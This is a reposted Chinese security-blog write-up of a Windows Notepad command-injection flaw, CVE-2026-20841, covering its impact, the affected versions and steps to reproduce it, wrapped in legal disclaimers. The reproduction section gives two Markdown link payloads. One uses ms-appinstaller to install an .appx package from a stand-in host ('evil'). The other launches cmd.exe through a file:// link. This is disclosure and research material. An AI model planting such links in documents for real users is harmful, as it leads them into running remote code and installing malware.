文章总结： 该文档披露了Windows记事本应用中的命令注入漏洞CVE-2026-20841，因特殊字符处理不当导致远程代码执行风险，影响版本为11.0.0至11.2510之前。攻击者可利用MarkDown功能通过恶意链接执行任意命令，造成系统完全控制、数据泄露等严重后果。建议用户及时更新至安全版本并谨慎处理外部链接。 综合评分： 78 文章分类： 漏洞预警,应用安全,终端安全,渗透测试,漏洞分析

复现Windows记事本最新漏洞-CVE-2026-20841

原创

喜欢挖洞吗 喜欢挖洞吗

喜欢挖洞吗

2026年2月12日 09:06 北京

免责声明

1. 1. 本公众号发布的网络安全工具、POC 脚本、技术文章等内容，仅面向具备合法授权的网络安全从业人员、技术爱好者用于合法合规的渗透测试、安全研究、漏洞验证及技术学习交流，严禁用于任何未经授权的非法攻击、入侵他人网络或信息系统的行为。
2. 2. 任何单位或个人在使用本公众号内容前，必须确保已获得目标系统的合法授权，并严格遵守《网络安全法》《数据安全法》《个人信息保护法》等国家相关法律法规及行业规范，独立承担因违规使用所产生的全部法律责任、经济损失及一切后果，与本公众号及作者无关。
3. 3. 本公众号发布的内容仅为技术研究与分享，不构成任何攻击指导、非法用途的暗示或诱导。所有工具及 POC 的安全性、稳定性未经全面验证，仅供学习参考，使用者需自行评估风险并承担使用后果，本公众号及作者不承担任何因工具使用不当、漏洞利用失误导致的直接或间接损失。
4. 4. 本公众号尊重并保护各类知识产权，发布的内容若涉及第三方技术、工具或资料，均已注明来源或基于合法授权。若存在侵权行为，请及时联系作者删除，任何未经授权的转载、篡改、传播本公众号内容的行为，需自行承担相应法律责任。
5. 5. 凡浏览、关注本公众号或使用本公众号内容者，即视为已充分理解并同意本免责声明全部条款。若您不同意本声明，请勿使用本公众号任何内容。

漏洞描述

CVE-2026-20841 是 Microsoft 开发的 Windows 记事本应用程序中发现的一个命令注入漏洞。该漏洞源于命令输入中特殊字符的处理不当，导致未经授权的攻击者能够通过网络远程执行任意命令。这对依赖记事本应用进行快速文本编辑或脚本的组织构成重大风险，因为成功利用该漏洞可能使攻击者获得未经授权的敏感系统访问并实施恶意行为。潜在后果不仅包括系统被攻破，还包括通过代码执行在受影响机器上传播的进一步攻击风险。

漏洞影响

远程代码执行 ：利用该漏洞使攻击者能够在受影响的系统上执行任意代码，可能导致对机器的完全控制、数据盗窃和恶意软件的安装。

数据泄露 ：攻击者能够在受害者的机器上执行命令，可能访问、篡改或泄露敏感数据，导致严重的数据泄露，影响组织的完整性和可信度。

攻击面增加 ：该漏洞出现在像 Notepad 这样广泛使用的应用中，显著增加了组织的攻击面，使其更容易受到网络犯罪组织的协调勒索软件攻击及其他利用尝试的攻击。

受影响的版本

Windows Notepad 11.0.0*< 11.2510

复现过程

1.复现环境

2.文件-新建”MarkDown”选项卡

2.在新建的MarkDown选项卡中输入

# install file[poc](ms-appinstaller://?source=https://evil/xxx.appx)
#run executable file[poc](file://C:/windows/system32/cmd.exe)

3.点击MarkDown语法按钮会变成已编排的格式，其实就是格式化一下内容。

4.使用Crtl+左键点击poc,第一个poc是安装软件，第二个是执行命令。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：喜欢挖洞吗 喜欢挖洞吗 喜欢挖洞吗《复现Windows记事本最新漏洞-CVE-2026-20841》